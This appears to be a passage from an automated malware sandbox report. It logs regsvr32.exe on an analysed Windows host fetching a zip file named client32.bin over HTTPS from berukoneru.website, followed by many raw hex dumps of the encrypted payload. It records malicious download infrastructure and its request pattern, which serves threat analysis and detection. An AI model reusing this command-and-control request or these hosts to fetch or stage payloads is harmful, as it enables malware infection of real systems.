5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:08 UTC1780INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                          2021-12-14 09:34:08 UTC1796INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:08 UTC1812INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          7192.168.2.54980379.110.52.144443C:\Windows\SysWOW64\regsvr32.exe
                          TimestampkBytes transferredDirectionData
                          2021-12-14 09:34:07 UTC1101OUTGET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC1166INHTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=g1gq8askkhd329edj5m5lndu22; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1166INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:08 UTC1182INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:08 UTC1294INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:08 UTC1342INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:08 UTC1358INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:08 UTC1550INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:08 UTC1582INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                          2021-12-14 09:34:08 UTC1646INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                          2021-12-14 09:34:08 UTC1662INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                          2021-12-14 09:34:08 UTC1700INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                          2021-12-14 09:34:08 UTC1716INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                          2021-12-14 09:34:08 UTC1732INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                          2021-12-14 09:34:08 UTC1819INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                          2021-12-14 09:34:08 UTC1835INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:08 UTC1851INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
